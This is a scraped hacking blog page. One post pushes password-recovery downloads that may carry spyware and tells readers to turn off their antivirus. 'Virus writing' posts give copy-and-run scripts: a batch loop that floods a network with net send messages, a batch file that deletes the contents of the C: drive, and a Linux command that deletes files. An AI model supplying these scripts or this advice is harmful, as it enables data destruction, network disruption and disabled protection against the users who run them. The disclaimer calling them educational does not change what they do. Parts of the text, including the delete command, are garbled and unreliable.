Tuesday, April 10, 2018

Donation


Donation for Help Others

Thursday, January 22, 2015

Recover Lost Yahoo Password


If you have ever used yahoo messenger on your comp. then you will get your password back. Though not 100% there is a very very high change. You can use one of the below software to recover your password.

In case you have recently formated your system then chances of recovery seems to be very less.These are IM pssword recovary softwares.


Trial downloads, only 4 chars reveled

Spyware free !00% safe


MessenPass 1.16


Instant Messengers Password Recovery Master


Advanced Instant Messengers Password Recovery 3.4


Rapidshare downloads,

no guarantee given may contain spyware and virus


Yahoo.Messenger.Password.


Note you need to turn off your antivirus(AV) before installing it as it may be considered as spyware by your AV.


Virus Code 17: Flood Your Network

This is the virus writing basics section. Today we are going to show you on flodding the network. This is demonstrated using Dos/Batch programming.


The below cade will temporarily flood network once the user turns off his comp everything will be back to normal.


:CRASH

net send * WORKGROUP ENABLED

net send * WORKGROUP ENABLED

GOTO CRASH

Just copy the code into a notepad file and save it as anything.bat.When you run it will start flodding your network.

As all the info given over here is purely for educational purpose it's readers responsibility to use it sensibly.

For more tips select "virus writing" label/option from below


Virus Code 20: Black Wolf Virus

This is the code of the "Black Wolf" virus.This is in c. You are at your own risk. If you spread this you will land behind the bar. We are giving this only for educational Purpose. You need to guess the header file for yourself.





This virus corrupts all the .com files . so be extremely careful what you do with it.

Virus Code 18: Delete All Files

This is the virus wirting basics section. Today we are going to show you how to delete all content. This is demonstrated using DOS programming and also in LINUX.


DOS programming

Paste the given code in notepad

@Echo off

Del C:\ *.*y


And save it like any_name.bat . Now run this file... All the data is gone from your PC.


LINUX

Just run the command

rm *.* will delete all files of any extention